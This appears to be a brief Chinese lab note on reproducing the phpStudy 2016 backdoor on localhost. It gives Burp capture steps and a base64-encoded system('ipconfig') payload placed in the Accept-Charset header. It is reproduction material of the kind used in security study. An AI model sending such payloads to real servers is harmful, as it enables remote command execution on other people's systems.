环境说明:
- kali Linux
- phpstudy(2016)
- php5.4+apache
burp 抓包
访问http://localhost/index.php在burp中抓包
需要注意的是,后面一定要跟xxx.php

右键 send to sequencer
Accept-Charset 后跟base64编码的系统命令:
如:
Accept-Charset:system('ipconfig'); #编码前
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw== #编码后

|